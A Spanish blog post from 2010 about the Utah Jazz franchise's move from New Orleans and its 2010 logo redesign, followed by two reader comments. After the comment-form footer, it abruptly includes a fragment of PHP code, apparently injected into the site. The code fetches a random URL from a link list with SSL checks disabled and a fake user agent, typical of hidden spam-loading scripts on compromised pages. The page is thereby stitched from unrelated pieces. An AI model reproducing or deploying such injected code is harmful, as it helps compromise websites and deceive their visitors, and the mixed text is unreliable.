A ritmo de Jazz

23 de July de 2010 por Faju

Para comprender la marca “Utah Jazz” tenemos que remontarnos a mediados de los 70 cuando la franquicia nació en la parte opuesta de los Estados Unidos, en la multicultural New Orleans, a 2300 kilómetros de las montañas de Salt Lake City. La cuna del jazz disfrutó de uno de los más grandes jugadores que ha dado este deporte, “Pistol” Pete Maravich, y de otros grandes jugadores como Spencer Haywood o Gail Goodrich. A pesar de ello, en 1979, en una dinámica perdedora y con grandes problemas en las relaciones con la ciudad, la franquicia se trasladó a Salt Lake City cerrando así una estancia de 5 años en el estado de Louisiana.

En una decisión similar a la tomada por los Grizzlies en 2001, al mantener el nombre en su migración de Vancouver a Memphis, los Jazz continuaron con su apodo aunque el nuevo estado al que representaban tuviera más relación con los monumentos naturales como Delicate Arch o Bryce Canyon, que con el estilo musical basado en la improvisación.

Primary Logo

Desde 1996, el logotipo de los Utah Jazz ha tenido prácticamente la misma forma. Las escarpadas montañas de Salt Lake City emergiendo de un balón han estado siempre presentes en la marca, eso sí, con diferentes colores. De la combinación de marrón, azul celeste y violeta pasaron en 2005 a una versión formada por una gama de azules. Y este 2010, de nuevo han reversionado el color, aplicando azul, verde, y amarillo cálido. Un aspecto renovado, pero teniendo muy presente los colores originales de la franquicia mormona.

Tipográficamente, hay un leve cambio en la letra utilizada en la palabra Utah, utilizando una fuente mucho más coherente con el logotipo secundario (fomado simplemente por las letras). La palabra Jazz mantiene sus formas puntiagudas, con un genuino aspecto NBA, el mismo que ha lucido los últimos catorce años.

Alternate logo

El rediseño presenta un notorio carácter Hardwood Classic. Recuperan el logotipo de la nota musical ejerciendo de “J”, desaparece la palabra Utah y se estilizan las líneas del balón. También se añade un reborde gris a todo el logotipo, lo que le da un aspecto un poco menos retro.

En cuanto al color, la cosa cambia pero también comedidamente. Se mantiene el azul marino y se recuperan el verde y el amarillo del logotipo original. El color corporativo de la franquicia ha variado mucho los últimos años, los road jerseys han sido verdes, púrpura, violeta, azul celeste, azul marino y negro. Seguramente, la nueva marca dará estabilidad al aspecto global en cuanto a color.

Aunque se presenta este logo como alternate logo, está por ver cual utilizarán más. La nota musical tiene un gran carácter, simbólica y gráficamente, aunque sea poco versátil al no tener una versión con el nombre del estado.

Una de las franquicias con más tradición y carisma en la liga, de nuevo con un aspecto renovado, y un logotipo que relucirá como nunca en el parquet del sonoro Energy Solutions Arena.

Comenta

2 comentarios a esta entrada

  1. Love Denise dice:
    #1

    muy buen articulo faju
    realmente, pienso que cuando trasladan una franquicia de una ciudad a otra, deberian siempre de cambiarle el nombre, si no lo hacen quedan cosas como L.A. lakers, o memphis grizzlies en las que la ciudad no tiene nada que ver con el nombre de la franquicia

      Citar

  2. Txusma dice:
    #2

    La verdad es que esto del diseño en la NBA es curioso. Ves ahora logos de hace 10 años y parece q haya pasado una eternidad.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>